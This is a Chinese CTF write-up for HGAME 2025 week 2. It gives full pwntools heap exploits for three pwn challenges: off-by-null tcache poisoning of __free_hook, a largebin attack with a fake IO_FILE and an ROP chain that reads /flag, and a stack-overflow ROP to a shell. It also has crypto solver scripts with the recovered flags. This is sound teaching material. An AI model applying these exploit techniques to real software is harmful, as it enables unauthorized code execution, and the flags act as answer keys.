[hgame2025]week2pwn/crypto

截止18号20点。都一星期了快忘了。

PWN sigin2heap

堆题，libc用的是2.27，有add,free,show，其中add有off_by_null

unsigned __int64 add() { unsigned int v0; // ebx unsigned int v2; // [rsp+Ch] [rbp-24h] BYREF unsigned int size; // [rsp+10h] [rbp-20h] BYREF unsigned int size_4; // [rsp+14h] [rbp-1Ch] unsigned __int64 v5; // [rsp+18h] [rbp-18h] v5 = __readfsqword(0x28u); printf("Index: "); __isoc99_scanf("%u", &v2); if ( v2 > 0xF ) { puts("There are only 16 pages."); } else if ( *((_QWORD *)&books + v2) ) { puts("The note already exists."); } else { while ( 1 ) { printf("Size: "); __isoc99_scanf("%u", &size); if ( size <= 0xFF ) break; puts("Too big!"); } v0 = v2; *((_QWORD *)&books + v0) = malloc(size); printf("Content: "); size_4 = read(0, *((void **)&books + v2), size); *(_BYTE *)(*((_QWORD *)&books + v2) + size_4) = 0;// off_by_null } return __readfsqword(0x28u) ^ v5; }

由于有size限制，需要先释放填满tcache才能释放到unsort。利用off_by_null将size的尾位置0释放到unsort时向前合并造成重叠，再通过tcacheAttack向__free_hook写system

一个板子题，用来凑数的。

from pwn import * context(arch='amd64', log_level='debug') elf = ELF('./vuln') libc = ELF('./libc-2.27.so') def add(idx,size,msg): p.sendafter(b"Your choice:", p32(1)) p.sendlineafter(b"Index: ", str(idx).encode()) p.sendlineafter(b"Size: ", str(size).encode()) p.sendafter(b"Content: ", msg) def free(idx): p.sendafter(b"Your choice:", p32(2)) p.sendlineafter(b"Index: ", str(idx).encode()) def show(idx): p.sendafter(b"Your choice:", p32(3)) p.sendlineafter(b"Index: ", str(idx).encode()) #p = process('./vuln') p = remote('node1.hgame.vidar.club', 31909) a = [0xf0,0x18,0x18,0x18]+[0xf0]*8+[0x18] for idx,size in enumerate(a): add(idx,size,b'A') for i in range(7): free(i+5) free(0) free(3) add(3, 0x18,flat(0,0,0x160)) free(4) add(0,0xd0,b'A') add(4,0x18,b'A') show(1) libc.address = u64(p.recvuntil(b'\x7f')[-6:]+b'\0\0') - 0x3ebca0 print(f"{libc.address = :x}") free(3) free(2) add(5,0x30,flat(0,0,0,0x21,p64(libc.sym['__free_hook']))) add(6,0x18,b'/bin/sh') add(7,0x18,p64(libc.sym['system'])) free(6) p.interactive() whereisVuln

把主要函数作成链接库。其实没多大区别。free有UAF。add,free,edit,show都有，也就没难度了。

用largebin attack在mp_.global_max_bins写值使400以上的进入到tcache再进行tcache attack。

有个小疑问，一般进行largebinattack时，unsort块要比large块略大，但这个要求略小才行。

这里有个问题，栈里有canary，当在栈里建块时会因为空间不够只能建到canary前，从而无法通过stack_check。所以这里写IO_list_all先执行个fake_IO_file将ROP读入到栈里（在read后，不是栈里函数后，函数已经exit执行不到这了）。

from pwn import * context(arch='amd64', log_level='debug') elf = ELF('./vuln') hgame = ELF('./libhgame.so') libc = ELF('./libc.so.6') def add(idx,size): p.sendlineafter(b">", b'1') p.sendlineafter(b"Index: ", str(idx).encode()) p.sendlineafter(b"Size: ", str(size).encode()) def free(idx): p.sendlineafter(b">", b'2') p.sendlineafter(b"Index: ", str(idx).encode()) def edit(idx, msg): p.sendlineafter(b">", b'3') p.sendlineafter(b"Index: ", str(idx).encode()) p.sendafter(b"Content: ", msg) def show(idx): p.sendlineafter(b">", b'4') p.sendlineafter(b"Index: ", str(idx).encode()) def Exit(): p.sendlineafter(b">", b'5') #p = process('./vuln') p = remote('node1.hgame.vidar.club', 30634) for idx,size in enumerate([0x520,0x500,0x510,0x500]): add(idx,size) free(0) add(4,0x540) free(2) show(0) large = u64(p.recvuntil(b'\x7f')[-6:]+b'\0\0') libc.address = large - 0x203f50 print(f"{libc.address = :x}") edit(0, b'A'*0x10) show(0) p.recvuntil(b'A'*0x10) heap = u64(p.recv(6)+b'\0\0') - 0x290 print(f"{heap = :x}") tcache_max_bins = libc.sym['obstack_exit_failure'] - 0x20 edit(0, flat(large, large, 0, tcache_max_bins-0x20)) add(5,0x540) free(3) free(1) edit(1,p64((heap+0x7d0>>12)^libc.sym['_environ']-0x18)) add(6,0x500) add(7,0x500) #environ edit(7, b'A'*0x18) show(7) p.recvuntil(b'A'*0x18) stack = u64(p.recvuntil(b'\x7f')[-6:]+b'\0\0') - 0x160 print(f"{stack = :x}") free(5) free(4) edit(4, p64((heap+0x1710>>12)^libc.sym['_IO_list_all'])) add(4,0x540) add(5,0x540) edit(5, p64(heap+0x2a0)) target = stack -0x1d0 fake_io_read = flat({ 0x00: 0x8000 | 0x40 | 0x1000, #_flags 0x20: target, #_IO_write_base 0x28: target + 0x200, #_IO_write_ptr 0x68: 0, #_chain 0x70: 0, # _fileno 0xc0: 0, #_modes 0xd8: libc.symbols['_IO_file_jumps'] - 0x8, #_vtables }, filler=b'\x00') edit(0, fake_io_read) #gdb.attach(p, "b*0x5555555552fa\nc") Exit() pop_rdi_ret = libc.address + 0x000000000010f75b pop_rsi_ret = libc.address + 0x0000000000110a4d pop_rdx_ret = libc.address + 0x0000000000066b9a # pop rdx ; ret 0x19 pop_rax_ret = libc.address + 0x00000000000dd237 syscall_ret = libc.sym['getpid'] + 9 ret = pop_rdi_ret + 1 payload = flat([ pop_rax_ret, 2, pop_rdi_ret, target + 0xa8+0x19, pop_rsi_ret, 0, syscall_ret, pop_rax_ret, 0, pop_rdi_ret, 3, pop_rsi_ret, target + 0x150, pop_rdx_ret, 0x50, syscall_ret, b'A'*0x19, pop_rax_ret, 1, pop_rdi_ret, 1, syscall_ret, b"/flag\0" ]) sleep(0.1) p.send(payload) p.interactive() HitList

又一个堆题。

add这个函数尖malloc返回空指针时会执行gift，执行任意地址free：把输入的一个地址，free掉。

另外在scanf("%s", src)这里有个溢出，拿到canary后就可以直接溢出ROP。

char *malloc_msg() { int v1; // [rsp+4h] [rbp-1Ch] BYREF char *dest; // [rsp+8h] [rbp-18h] char src[8]; // [rsp+10h] [rbp-10h] BYREF unsigned __int64 v4; // [rsp+18h] [rbp-8h] v4 = __readfsqword(0x28u); puts("Name: "); putchar(62); __isoc99_scanf("%s", src); puts("Additional information to consider: "); puts("Size:"); putchar(62); __isoc99_scanf("%u", &v1); if ( v1 <= 0x3F0 ) { dest = (char *)malloc(v1 + 8); if ( dest ) { putchar(62); strncpy(dest, src, 8uLL); read(0, dest + 8, v1); return dest; } else { puts("Memory allocation failed."); return (char *)(int)gift(); } } else { puts("Too big."); return 0LL; } }

edit并不会直接修改而是先free再add。通过原块里的残留得到libc和堆地址。

先在堆里作个块头，用gift释放掉再申请就得到重叠块。利用show里使用的指针得到栈地址和canary。然后到malloc_msg里溢出写ROP

from pwn import * context(arch='amd64', log_level='debug') libc = ELF('./libc.so.6') elf = ELF('./vuln') def add(idx, name,size,msg): p.sendlineafter(b'>', b'1') p.sendlineafter(b'>', str(idx).encode()) p.sendlineafter(b'>', name) p.sendlineafter(b'>', str(size).encode()) #-9 gift if size<0x400: p.sendafter(b'>', msg) def free(idx): p.sendlineafter(b'>', b'2') p.sendlineafter(b'>', str(idx).encode()) def edit(idx,num, name, size,msg): p.sendlineafter(b'>', b'3') p.sendlineafter(b'>', str(idx).encode()) p.sendlineafter(b'>', str(num).encode()) p.sendlineafter(b'>', name) p.sendlineafter(b'>', str(size).encode()) #-9 gift p.sendafter(b'>', msg) def show(idx): p.sendlineafter(b'>', b'4') p.sendlineafter(b'>', str(idx).encode()) #p = process('./vuln') p = remote('node1.hgame.vidar.club', 31888) for i in range(8): add(i,b'A', 0x80, b'A') for i in range(7): edit(i+1,1,b'A',0,b'') edit(0,1,b'A',0,b'') show(0) p.recvuntil(b"Information: ") libc.address = u64(p.recv(6)+b'\0\0') - 0x21ad60 print(f"{libc.address = :x}") free(1) edit(0,1,b'A',0x20,b'A'*0x10) show(0) p.recvuntil(b'A'*0x10) heap = u64(p.recv(6)+b'\0\0') - 0x8a0 print(f"{heap = :x}") edit(0,1,b'A',0x8,b'A') add(8,b'A',0x60, flat(0x21,0,0,0,0x21,0,0,0,0x51)) #stack #gdb.attach(p, "b*0x5555555553c4\nc") edit(0,1,b'A',-9,hex(heap+0x340).encode()+b'\n') edit(0,1,b'A',0x40,flat(0,0,0x31,7,0,0,libc.sym['_environ'])) #gdb.attach(p, "b*0x5555555559ca\nc") show(7) stack = u64(p.recvuntil(b'\x7f')[-6:]+b'\0\0') - 0x140 print(f"{stack = :x}") #canary #gdb.attach(p, "b*0x5555555559ca\nc") edit(0,1,b'A',0x40,flat(0,0,0x31,7,0,0,stack+9)) show(7) p.recvuntil(b"Information: ") canary = b'\0'+p.recv(7) print(f"{canary.hex() =}") #gdb.attach(p, "b*0x55555555551c\nc") pop_rdi = libc.address + 0x000000000002a3e5 # pop rdi ; ret rop = flat(0,canary,0, pop_rdi+1, pop_rdi, next(libc.search(b'/bin/sh\0')), libc.sym['system']) add(9,rop, 0x800, b'A') #gdb.attach(p) #pause() p.interactive()

 

Crypto Ancient_Recall

题目

import random Major_Arcana = ["The Fool", "The Magician", "The High Priestess","The Empress", "The Emperor", "The Hierophant","The Lovers", "The Chariot", "Strength","The Hermit", "Wheel of Fortune", "Justice","The Hanged Man", "Death", "Temperance","The Devil", "The Tower", "The Star","The Moon", "The Sun", "Judgement","The World"] wands = ["Ace of Wands", "Two of Wands", "Three of Wands", "Four of Wands", "Five of Wands", "Six of Wands", "Seven of Wands", "Eight of Wands", "Nine of Wands", "Ten of Wands", "Page of Wands", "Knight of Wands", "Queen of Wands", "King of Wands"] cups = ["Ace of Cups", "Two of Cups", "Three of Cups", "Four of Cups", "Five of Cups", "Six of Cups", "Seven of Cups", "Eight of Cups", "Nine of Cups", "Ten of Cups", "Page of Cups", "Knight of Cups", "Queen of Cups", "King of Cups"] swords = ["Ace of Swords", "Two of Swords", "Three of Swords", "Four of Swords", "Five of Swords", "Six of Swords", "Seven of Swords", "Eight of Swords", "Nine of Swords", "Ten of Swords", "Page of Swords", "Knight of Swords", "Queen of Swords", "King of Swords"] pentacles = ["Ace of Pentacles", "Two of Pentacles", "Three of Pentacles", "Four of Pentacles", "Five of Pentacles", "Six of Pentacles", "Seven of Pentacles", "Eight of Pentacles", "Nine of Pentacles", "Ten of Pentacles", "Page of Pentacles", "Knight of Pentacles", "Queen of Pentacles", "King of Pentacles"] Minor_Arcana = wands + cups + swords + pentacles tarot = Major_Arcana + Minor_Arcana reversals = [0,-1] Value = [] cards = [] YOUR_initial_FATE = [] while len(YOUR_initial_FATE)<5: card = random.choice(tarot) if card not in cards: cards.append(card) if card in Major_Arcana: k = random.choice(reversals) Value.append(tarot.index(card)^k) if k == -1: YOUR_initial_FATE.append("re-"+card) else: YOUR_initial_FATE.append(card) else: Value.append(tarot.index(card)) YOUR_initial_FATE.append(card) else: continue print("Oops!lets reverse 1T!") FLAG=("hgame{"+"&".join(YOUR_initial_FATE)+"}").replace(" ","_") YOUR_final_Value = Value def Fortune_wheel(FATE): FATEd = [FATE[i]+FATE[(i+1)%5] for i in range(len(FATE))] return FATEd for i in range(250): YOUR_final_Value = Fortune_wheel(YOUR_final_Value) print(YOUR_final_Value) YOUR_final_FATE = [] for i in YOUR_final_Value: YOUR_final_FATE.append(tarot[i%78]) print("Your destiny changed!\n",",".join(YOUR_final_FATE)) print("oh,now you GET th3 GOOd lU>k,^^") """ Oops!lets reverse 1T! [2532951952066291774890498369114195917240794704918210520571067085311474675019, 2532951952066291774890327666074100357898023013105443178881294700381509795270, 2532951952066291774890554459287276604903130315859258544173068376967072335730, 2532951952066291774890865328241532885391510162611534514014409174284299139015, 2532951952066291774890830662608134156017946376309989934175833913921142609334] Your destiny changed! Eight of Cups,Ace of Cups,Strength,The Chariot,Five of Swords oh,now you GET th3 GOOd lU>k,^^ """

参数是个杨辉三角，可以先处理一下得到5个方程的系数。得到系数就能直接解出明文

#杨辉3角 def Fortune_wheel(FATE): FATEd = [FATE[i]+FATE[(i+1)%5] for i in range(len(FATE))] return FATEd var('x0 x1 x2 x3 x4') a = [x0,x1,x2,x3,x4] for i in range(250): a = Fortune_wheel(a) f = [a[i]-b[i] for i in range(5)] solve(f,[x0,x1,x2,x3,x4]) #[[x0 == -19, x1 == -20, x2 == 20, x3 == -15, x4 == 41]] c = [-19,-20,20,-15,41] a = [] for i in c: if i<0: a.append('re-'+tarot[i^^-1]) else: a.append(tarot[i]) ("hgame{"+"&".join(a)+"}").replace(" ","_") #hgame{re-The_Moon&re-The_Sun&Judgement&re-Temperance&Six_of_Cups} IntergalacticBound from Crypto.Util.number import * from Crypto.Cipher import AES from Crypto.Util.Padding import pad from random import randint import hashlib from secrets import flag def add_THCurve(P, Q): if P == (0, 0): return Q if Q == (0, 0): return P x1, y1 = P x2, y2 = Q x3 = (x1 - y1 ** 2 * x2 * y2) * pow(a * x1 * y1 * x2 ** 2 - y2, -1, p) % p y3 = (y1 * y2 ** 2 - a * x1 ** 2 * x2) * pow(a * x1 * y1 * x2 ** 2 - y2, -1, p) % p return x3, y3 def mul_THCurve(n, P): R = (0, 0) while n > 0: if n % 2 == 1: R = add_THCurve(R, P) P = add_THCurve(P, P) n = n // 2 return R p = getPrime(96) a = randint(1, p) G = (randint(1,p), randint(1,p)) d = (a*G[0]^3+G[1]^3+1)%p*inverse(G[0]*G[1],p)%p x = randint(1, p) Q = mul_THCurve(x, G) print(f"p = {p}") print(f"G = {G}") print(f"Q = {Q}") key = hashlib.sha256(str(x).encode()).digest() cipher = AES.new(key, AES.MODE_ECB) flag = pad(flag,16) ciphertext = cipher.encrypt(flag) print(f"ciphertext={ciphertext}") """ p = 55099055368053948610276786301 G = (19663446762962927633037926740, 35074412430915656071777015320) Q = (26805137673536635825884330180, 26376833112609309475951186883) ciphertext=b"k\xe8\xbe\x94\x9e\xfc\xe2\x9e\x97\xe5\xf3\x04'\x8f\xb2\x01T\x06\x88\x04\xeb3Jl\xdd Pk$\x00:\xf5" """

关于Twisted Hessian Curve，这个自己猜是猜不出来的。这个曲线很标准没有变化。可以直接套模板映射到椭圆曲线，这里的order都是小因子，可以直接求对数求解。

#a*x^3 + y^3 + 1 = d*x*y Twisted Hessian Curve #根据两点求参a,d P.<a,d> = PolynomialRing(Zmod(p)) f1 = a*G[0]^3 + G[1]^3 + 1 -d*G[0]*G[1] f2 = a*Q[0]^3 + Q[1]^3 + 1 -d*Q[0]*Q[1] F = [f1,f2] Ideal = Ideal(F) I = Ideal.groebner_basis() print(I) res=[x.constant_coefficient() for x in I] a = -res[0]%p d = -res[1]%p #8569490478014112404683314361 R.<x,y,z> = Zmod(p)[] cubic = a*x^3 + y^3 + z^3 - d*x*y*z E = EllipticCurve_from_cubic(cubic,morphism=True) G = E(G) Q = E(Q) #求dlp #factor(G.order()) = 3 * 23 * 661 * 252919 * 115274309 * 13812057089 #都是小因子直接求DLP m = discrete_log(Q, G,operation = "+") #2633177798829352921583206736 key = hashlib.sha256(str(int(m)).encode()).digest() cipher = AES.new(key, AES.MODE_ECB) cipher.decrypt(ciphertext) #hgame{N0th1ng_bu7_up_Up_UP!} SPiCa

正交格

from Crypto.Util.number import getPrime, long_to_bytes,bytes_to_long from secrets import flag from sage.all import * def derive_M(n): iota=0.035 Mbits=int(2 * iota * n^2 + n * log(n,2)) M = random_prime(2^Mbits, proof = False, lbound = 2^(Mbits - 1)) return Integer(M) m = bytes_to_long(flag).bit_length() n = 70 p = derive_M(n) F = GF(p) x = random_matrix(F, 1, n) A = random_matrix(ZZ, n, m, x=0, y=2) A[randint(0, n-1)] = vector(ZZ, list(bin(bytes_to_long(flag))[2:])) h = x*A with open("data.txt", "w") as file: file.write(str(m) + "\n") file.write(str(p) + "\n") for item in h: file.write(str(item) + "\n")

也是个板子题，没可说之处。 

#x*A = c ,A是01的稀疏矩阵 解正交格 BL = block_matrix(ZZ,[ [p,0], [Matrix(ZZ,c).T,1] ]) OL = BL.LLL() OL2 = Matrix(ZZ,OL[:m-n,1:]) Ker = OL2.right_kernel().matrix() Ker = Ker.BKZ() def check(v): if(all(i == 1 or i == 0 for i in v)): return v elif(all(i == -1 or i == 0 for i in v)): return -v def find(Ker,x): x = [i for i in ini] while(1): for vi in x: for i in Ker: xi1 = check(i + vi) xi2 = check(i - vi) if xi1 and xi1 not in x: x.append(xi1) if(len(x) == n): return Matrix(ZZ,x) if xi2 and xi2 not in x: x.append(xi2) if(len(x) == n): return Matrix(ZZ,x) ini = [check(vi) for vi in Ker if check(vi)] x = find(Ker,ini) for i in x: v = long_to_bytes(int(''.join(map(str,i)),2)) if b'hgame' in v: print(v) #hgame{U_f0und_3he_5pec14l_0n3!}